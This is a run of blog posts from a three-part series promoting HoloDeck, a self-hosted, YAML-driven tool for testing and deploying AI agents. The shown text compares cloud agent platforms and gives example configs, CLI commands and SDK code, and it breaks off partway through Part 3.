&lt;h2&gt;
  
  
  The Cloud Providers
&lt;/h2&gt;

&lt;p&gt;All three major clouds have agent platforms now. They're impressive, but they come with the obvious trade-off: you're locked into their ecosystem.&lt;/p&gt;

&lt;h3&gt;
  
  
  Azure AI Foundry (Microsoft)
&lt;/h3&gt;

&lt;p&gt;Azure AI Foundry is Microsoft's enterprise play. It integrates with the whole Microsoft stack—Teams, Copilot, etc. If you're already a Microsoft shop, there's a lot to like.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;What i want&lt;/th&gt;
&lt;th&gt;Azure AI Foundry&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Deployment Model&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Self-hosted (open-source)&lt;/td&gt;
&lt;td&gt;SaaS (Azure-dependent)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CI/CD Integration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CLI, works anywhere&lt;/td&gt;
&lt;td&gt;Azure DevOps/GitHub Actions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Definition&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pure YAML&lt;/td&gt;
&lt;td&gt;YAML Workflows and Prompt agents&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Primary Focus&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Experimentation &amp;amp; deployment&lt;/td&gt;
&lt;td&gt;Enterprise agent orchestration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Orchestration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Multi-agent patterns&lt;/td&gt;
&lt;td&gt;Multi-agent via Agents Framework or Workflows&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Self-Hosted&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No (Azure required)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Evaluation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Custom criteria, LLM-as-judge, NLP&lt;/td&gt;
&lt;td&gt;LLM-as-judge, NLP metrics&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The workflows and prompt-based agents are interesting, but still hard locked into the Foundry offering.&lt;/p&gt;




&lt;h3&gt;
  
  
  Amazon Bedrock AgentCore (AWS)
&lt;/h3&gt;

&lt;p&gt;Bedrock AgentCore is AWS's managed agent service. Good for running agents at scale if you're already on AWS and using their model offerings.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;What i want&lt;/th&gt;
&lt;th&gt;Amazon Bedrock AgentCore&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Deployment Model&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Self-hosted (open-source)&lt;/td&gt;
&lt;td&gt;SaaS (AWS-managed)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CI/CD Integration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CLI, works anywhere&lt;/td&gt;
&lt;td&gt;AWS CodePipeline?/API-based&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Definition&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pure YAML&lt;/td&gt;
&lt;td&gt;Code (SDK + LangGraph, CrewAI, etc.)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Primary Focus&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Experimentation &amp;amp; deployment&lt;/td&gt;
&lt;td&gt;Enterprise agent operations at scale&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Orchestration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Multi-agent patterns&lt;/td&gt;
&lt;td&gt;Multi-agent collaboration (supervisor modes)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Self-Hosted&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No (AWS required)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Evaluation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Custom criteria, LLM-as-judge, NLP&lt;/td&gt;
&lt;td&gt;LLM-as-judge, custom metrics, RAG eval&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Self-Hosted LLMs&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Native support (Ollama, vLLM)&lt;/td&gt;
&lt;td&gt;Bedrock models only&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;If you want to use local models or run outside AWS, this isn't really an option.&lt;/p&gt;




&lt;h3&gt;
  
  
  Vertex AI Agent Engine (Google Cloud)
&lt;/h3&gt;

&lt;p&gt;Google's entry into the agent space. The A2A protocol for multi-agent communication is interesting. Like the others, you're tied to GCP.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;What i want&lt;/th&gt;
&lt;th&gt;Vertex AI Agent Engine&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Deployment Model&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Self-hosted (open-source)&lt;/td&gt;
&lt;td&gt;SaaS (GCP-managed)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CI/CD Integration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CLI, works anywhere&lt;/td&gt;
&lt;td&gt;Cloud Build/GitHub Actions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Definition&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pure YAML&lt;/td&gt;
&lt;td&gt;Code (ADK, LangChain, LangGraph)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Primary Focus&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Experimentation &amp;amp; deployment&lt;/td&gt;
&lt;td&gt;Production agent runtime&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Orchestration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Multi-agent patterns&lt;/td&gt;
&lt;td&gt;Multi-agent via A2A protocol&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Self-Hosted&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No (GCP required)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Evaluation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Custom criteria, LLM-as-judge, NLP&lt;/td&gt;
&lt;td&gt;LLM-as-judge (Gemini), ROUGE/BLEU&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Self-Hosted LLMs&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Native support (Ollama, vLLM)&lt;/td&gt;
&lt;td&gt;vLLM in Model Garden (complex setup)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Similar story—great if you're committed to GCP, but not portable.&lt;/p&gt;




&lt;h2&gt;
  
  
  What's Missing
&lt;/h2&gt;

&lt;p&gt;After looking at all of these, here's what I couldn't find:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Self-hosted and cloud-agnostic&lt;/strong&gt; - Everything is either SaaS or tied to a specific cloud&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Declarative agent definition&lt;/strong&gt; - Most require SDK code, not just config&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Vendor-neutral CI/CD&lt;/strong&gt; - The integrations assume you're using their ecosystem&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Testing + evaluation + deployment in one place&lt;/strong&gt; - Usually you're stitching together multiple tools&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is the gap I'm trying to fill with HoloDeck. Not saying it's better than these tools—they're solving different problems. But if you care about portability and owning your workflow, there wasn't much out there.&lt;/p&gt;




&lt;h2&gt;
  
  
  Quick Reference
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;If you need...&lt;/th&gt;
&lt;th&gt;Look at...&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Production observability for LangChain&lt;/td&gt;
&lt;td&gt;LangSmith&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ML experiment tracking at scale&lt;/td&gt;
&lt;td&gt;MLflow&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Visual prompt flow design on Azure&lt;/td&gt;
&lt;td&gt;PromptFlow&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Enterprise agents in Microsoft ecosystem&lt;/td&gt;
&lt;td&gt;Azure AI Foundry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Managed agents on AWS&lt;/td&gt;
&lt;td&gt;Bedrock AgentCore&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Production runtime on GCP&lt;/td&gt;
&lt;td&gt;Vertex AI Agent Engine&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Self-hosted, config-driven, CI/CD-native&lt;/td&gt;
&lt;td&gt;HoloDeck&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Next Up
&lt;/h2&gt;

&lt;p&gt;In &lt;a href="https://justinbarias.github.io//blog/holodeck-part3-solution" rel="noopener noreferrer"&gt;Part 3&lt;/a&gt;, I'll walk through how HoloDeck works—the design decisions, the YAML config approach, the SDK, and what's actually built vs. what's still on the roadmap.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/jeremiahbarias/holodeck-part-3-how-im-approaching-agent-development-4gck"&gt;Continue to Part 3 →&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>genai</category>
      <category>agents</category>
    </item>
    <item>
      <title>HoloDeck Part 1: Why Building AI Agents Feels So Broken</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Fri, 15 Nov 2024 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/holodeck-part-1-why-building-ai-agents-feels-so-broken-5h82</link>
      <guid>https://dev.to/jeremiahbarias/holodeck-part-1-why-building-ai-agents-feels-so-broken-5h82</guid>
      <description>&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌──────────────────────────────────────────────────────────────────────┐
│ Today's Agent Development Workflow (The Problem) │
└──────────────────────────────────────────────────────────────────────┘

    ┌─────────────────┐
    │ BUILD │ (LangChain/CrewAI/AutoGen)
    │ Fragmented │
    │ Frameworks │
    └────────┬────────┘
             │
             │ Manual Testing
             ▼
    ┌─────────────────────────────────────────┐
    │ EVALUATE │
    │ (Evaluation SDKs / Unit Tests / E2E) │
    │ (Manual Testing / Jupyter Notebooks) │
    └────────┬────────────────────────────────┘
             │
             │ Guess &amp;amp; Check
             ▼
    ┌─────────────────┐
    │ DEPLOY │ (Docker / Custom Orchestration)
    │ Custom Scripts │
    └────────┬────────┘
             │
             │ Hope it Works
             ▼
    ┌─────────────────┐
    │ MONITOR │ (Datadog / Custom Logs)
    │ Reactive Fixes │
    └────────┬────────┘
             │
             │ Something Broke?
             │
             └─────────────────────────┐
                                       │
                              (Loop Back to BUILD)
                                       │
                                       ▼

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The AI agent hype is everywhere. But unlike the deep learning era that gave us reproducible experiments and systematic tooling, we're building agents with &lt;em&gt;ad-hoc&lt;/em&gt; tools, fragmented frameworks, and basically no methodology. I've been frustrated by this for a while, and I wanted to write down what I think is broken.&lt;/p&gt;




&lt;h2&gt;
  
  
  This is Part 1 of a 3-Part Series
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Why Building AI Agents Feels So Broken&lt;/strong&gt; (You are here)&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dev.to/jeremiahbarias/holodeck-part-2-whats-out-there-for-ai-agents-4880"&gt;What's Out There&lt;/a&gt; - Looking at LangSmith, MLflow, and the major cloud providers&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dev.to/jeremiahbarias/holodeck-part-3-how-im-approaching-agent-development-4gck"&gt;What I'm Building&lt;/a&gt; - HoloDeck's approach and how it works&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  The Mess We're In
&lt;/h2&gt;

&lt;p&gt;There's no shortage of frameworks—LangChain, LlamaIndex, CrewAI, Autogen, and dozens more. Each promises to simplify agent development. But they all leave you solving the &lt;em&gt;same hard problems&lt;/em&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;How do I know which prompt actually works?&lt;/strong&gt; You tweak it manually. Test it manually. Repeat endlessly.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;How do I make my agent safe?&lt;/strong&gt; You add guardrails ad-hoc. Validation rules scattered across your codebase. No systematic testing.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;How do I optimize performance?&lt;/strong&gt; You adjust temperature, top_p, max tokens. Trial and error until something seems to work.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;How do I deploy this reliably?&lt;/strong&gt; You build custom orchestration. Write deployment scripts. Manage versioning yourself.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;How do I know my agent still works after I changed that one thing?&lt;/strong&gt; You hope. You test manually. You ship bugs to production.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here's what bugs me: we're shipping &lt;em&gt;agents&lt;/em&gt;, not code. Yet we treat them like traditional software—write it once, deploy it, call it done. But agents are probabilistic systems. Their behavior varies. Their performance degrades. Their configurations matter as much as their code.&lt;/p&gt;

&lt;p&gt;Something's off.&lt;/p&gt;




&lt;h2&gt;
  
  
  Why This Bugs Me Now
&lt;/h2&gt;

&lt;p&gt;Agents aren't just demos anymore. They're going into production:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Customer support&lt;/strong&gt; - Agents handling real customer queries, with real consequences for bad responses&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code generation&lt;/strong&gt; - Agents writing and deploying code, with security implications&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Data analysis&lt;/strong&gt; - Agents making decisions that inform business strategy&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Workflow automation&lt;/strong&gt; - Agents executing multi-step processes with real-world effects&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When your agent hallucinates in a Jupyter notebook, you shrug and re-run the cell. When your agent hallucinates in production, you lose customers, leak data, or worse.&lt;/p&gt;

&lt;p&gt;The gap between "cool demo" and "production-ready" is huge. And I've watched teams discover this the hard way—including my own.&lt;/p&gt;




&lt;h2&gt;
  
  
  We've Done This Before
&lt;/h2&gt;

&lt;p&gt;Here's what I keep coming back to: the deep learning revolution wasn't about finding the perfect neural network. It was about &lt;strong&gt;systematizing the process&lt;/strong&gt; of building them.&lt;/p&gt;

&lt;p&gt;Think about the traditional ML pipeline:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Define architecture&lt;/strong&gt; - Choose layers, activation functions, size. The &lt;em&gt;structure&lt;/em&gt; matters.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Define loss function&lt;/strong&gt; - Quantify what "good" means. Measure it.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hyperparameter search&lt;/strong&gt; - Systematically explore temperature, learning rate, batch size. Test rigorously.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Evaluate and iterate&lt;/strong&gt; - Run experiments. Compare results. Make data-driven decisions.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This wasn't guesswork. It was &lt;em&gt;scientific method applied to AI&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;The community built frameworks around this—Keras, PyTorch, TensorFlow. They made the pipeline accessible. Suddenly, thousands of practitioners could build sophisticated models because the &lt;em&gt;methodology&lt;/em&gt; was codified.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;But somehow, we've abandoned this for agents.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;We're back to hand-tuning prompts. Testing agents by running them once. Deploying based on gut feel. Ignoring the systematic approach that made deep learning successful.&lt;/p&gt;

&lt;p&gt;Why did we regress?&lt;/p&gt;




&lt;h2&gt;
  
  
  So What's Out There?
&lt;/h2&gt;

&lt;p&gt;Before I started building my own thing, I wanted to understand the landscape. In &lt;a href="https://justinbarias.github.io//blog/holodeck-part2-comparison" rel="noopener noreferrer"&gt;Part 2&lt;/a&gt;, I look at what's available:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;LangSmith&lt;/strong&gt; (LangChain's observability platform)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;MLflow GenAI&lt;/strong&gt; (Databricks)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Microsoft PromptFlow&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Azure AI Foundry&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Amazon Bedrock AgentCore&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Google Vertex AI Agent Engine&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;They all solve &lt;em&gt;parts&lt;/em&gt; of the problem. But I couldn't find anything that addressed everything I cared about. Also, they all &lt;em&gt;locked&lt;/em&gt; you in to a platform/ecosystem.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/jeremiahbarias/holodeck-part-2-whats-out-there-for-ai-agents-4880"&gt;Continue to Part 2 →&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>agents</category>
      <category>evals</category>
    </item>
    <item>
      <title>HoloDeck Part 3: How I'm Approaching Agent Development</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Fri, 15 Nov 2024 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/holodeck-part-3-how-im-approaching-agent-development-4gck</link>
      <guid>https://dev.to/jeremiahbarias/holodeck-part-3-how-im-approaching-agent-development-4gck</guid>
      <description>&lt;p&gt;In &lt;a href="https://dev.to/jeremiahbarias/holodeck-part-1-why-building-ai-agents-feels-so-broken-5h82"&gt;Part 1&lt;/a&gt;, I talked about what feels broken in agent development. In &lt;a href="https://dev.to/jeremiahbarias/holodeck-part-2-whats-out-there-for-ai-agents-4880"&gt;Part 2&lt;/a&gt;), I looked at what's out there. Now let me walk through what I'm building.&lt;/p&gt;




&lt;h2&gt;
  
  
  This is Part 3 of a 3-Part Series
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;a href="https://dev.to/jeremiahbarias/holodeck-part-1-why-building-ai-agents-feels-so-broken-5h82"&gt;Why It Feels Broken&lt;/a&gt; - What's wrong with agent development&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dev.to/jeremiahbarias/holodeck-part-2-whats-out-there-for-ai-agents-4880"&gt;What's Out There&lt;/a&gt; - The current landscape&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;How HoloDeck Works&lt;/strong&gt; (You are here)&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  The Core Idea
&lt;/h2&gt;

&lt;p&gt;The insight that got me started: &lt;strong&gt;agents are systems with measurable components that can be optimized systematically.&lt;/strong&gt; We did this for ML. Why not agents?&lt;/p&gt;

&lt;h3&gt;
  
  
  The Analogy
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Traditional ML&lt;/th&gt;
&lt;th&gt;Agent Engineering&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;NN Architecture&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Agent Artifacts (prompts, instructions, tools, memory)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Loss Function&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Evaluators (NLP metrics, LLM-as-judge, custom scoring)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Hyperparameters&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Configuration (temperature, top_p, max_tokens, model)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Training Loop&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Agent Execution Framework&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Evaluation Metrics&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Agent Benchmarks &amp;amp; Test Suites&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Model Checkpoints&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Agent Versions &amp;amp; Snapshots&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;ML engineers don't manually tweak neural network weights. So why are we manually tweaking agent behavior? We should be able to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Version our artifacts&lt;/strong&gt; - Track which prompts, tools, and instructions we're using&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Measure systematically&lt;/strong&gt; - Define evaluators that quantify agent performance&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Optimize through configuration&lt;/strong&gt; - Run experiments across temperature, top_p, context length, tool selection&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Test rigorously&lt;/strong&gt; - Benchmark against baselines, compare variants, ship only what passes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;That's the approach I'm taking.&lt;/p&gt;




&lt;h2&gt;
  
  
  How &lt;a href="https://useholodeck.ai/" rel="noopener noreferrer"&gt;HoloDeck&lt;/a&gt; Works
&lt;/h2&gt;

&lt;p&gt;Three design principles:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Configuration-First&lt;/strong&gt; - Pure YAML defines agents, not code&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Measurement-Driven&lt;/strong&gt; - Evaluation baked in from the start&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CI/CD Native&lt;/strong&gt; - Agents deploy like code&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Architecture
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌─────────────────────────────────────────────────────────┐
│                    HOLODECK PLATFORM                    │
└─────────────────────────────────────────────────────────┘
                           │
        ┌──────────────────┼──────────────────┐
        ▼                  ▼                  ▼
┌──────────────┐  ┌──────────────┐  ┌──────────────┐
│   Agent      │  │  Evaluation  │  │  Deployment  │
│   Engine     │  │  Framework   │  │  Engine      │
└──────────────┘  └──────────────┘  └──────────────┘
        │                  │                  │
        ├─ LLM Providers   ├─ AI Metrics     ├─ FastAPI
        ├─ Tool System     ├─ NLP Metrics    ├─ Docker
        ├─ Memory          ├─ Custom Evals   ├─ Cloud Deploy
        └─ Vector Stores   └─ Reporting      └─ Monitoring
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Config-First Design
&lt;/h2&gt;

&lt;p&gt;You define your entire agent in YAML. Here's a simple example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;name: "My First Agent"
description: "A helpful AI assistant"
model:
  provider: "openai"
  name: "gpt-4o-mini"
  temperature: 0.7
  max_tokens: 1000
instructions:
  inline: |
    You are a helpful AI assistant.
    Answer questions accurately and concisely.

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No Python. No custom code. You define &lt;em&gt;what&lt;/em&gt; your agent does, HoloDeck handles &lt;em&gt;how&lt;/em&gt; it runs.&lt;/p&gt;

&lt;p&gt;Then interact via the CLI:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Initialize a new project
holodeck init my-chatbot

# Edit your agent configuration
# (customize agent.yaml as needed)

# Chat with your agent interactively
holodeck chat agent.yaml

# Run automated tests
holodeck test agent.yaml

# Deploy as a local API
holodeck deploy agent.yaml --port 8000

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Pretty minimal. The &lt;a href="https://docs.useholodeck.ai/" rel="noopener noreferrer"&gt;docs&lt;/a&gt; cover more complex setups—tools, memory, evaluators.&lt;/p&gt;




&lt;h2&gt;
  
  
  When You Need Code
&lt;/h2&gt;

&lt;p&gt;YAML isn't everything. For programmatic test execution, dynamic configuration, or complex workflows, there's an SDK:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from holodeck.config.loader import ConfigLoader
from holodeck.lib.test_runner.executor import TestExecutor
import os

# Load configuration with environment variable support
os.environ["OPENAI_API_KEY"] = "sk-..."
loader = ConfigLoader()
config = loader.load("agent.yaml")

# Run tests programmatically
executor = TestExecutor()
results = executor.run_tests(config)

# Access detailed results with metrics
for test_result in results.test_results:
    print(f"Test: {test_result.test_name}")
    print(f"Status: {test_result.status}")
    print(f"Metrics: {test_result.metrics}")

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Start with YAML, drop into code when you need to. The SDK gives you:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://docs.useholodeck.ai/api/config-loader/" rel="noopener noreferrer"&gt;ConfigLoader&lt;/a&gt; - dynamic configuration&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://docs.useholodeck.ai/api/test-runner/" rel="noopener noreferrer"&gt;TestExecutor&lt;/a&gt; - test orchestration&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://docs.useholodeck.ai/api/models/" rel="noopener noreferrer"&gt;Agent Models&lt;/a&gt; - Pydantic validation&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://docs.useholodeck.ai/api/evaluators/" rel="noopener noreferrer"&gt;Evaluators&lt;/a&gt; - NLP metrics and LLM-as-judge scoring&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  DevOps Integration
&lt;/h2&gt;

&lt;p&gt;Agents should work like software:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Version Control&lt;/strong&gt; - Agent configs are versioned. Track changes, rollback if needed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Testing Pipeline&lt;/strong&gt; - Run agents through test suites. Compare across versions.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;holodeck test agents/customer_support.yaml
holodeck deploy agents/ --env staging --monitor

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Monitoring&lt;/strong&gt; - &lt;a href="https://opentelemetry.io/" rel="noopener noreferrer"&gt;OpenTelemetry&lt;/a&gt; integration following &lt;a href="https://opentelemetry.io/docs/specs/semconv/gen-ai/" rel="noopener noreferrer"&gt;GenAI Semantic Conventions&lt;/a&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Standard trace, metric, and log collection&lt;/li&gt;
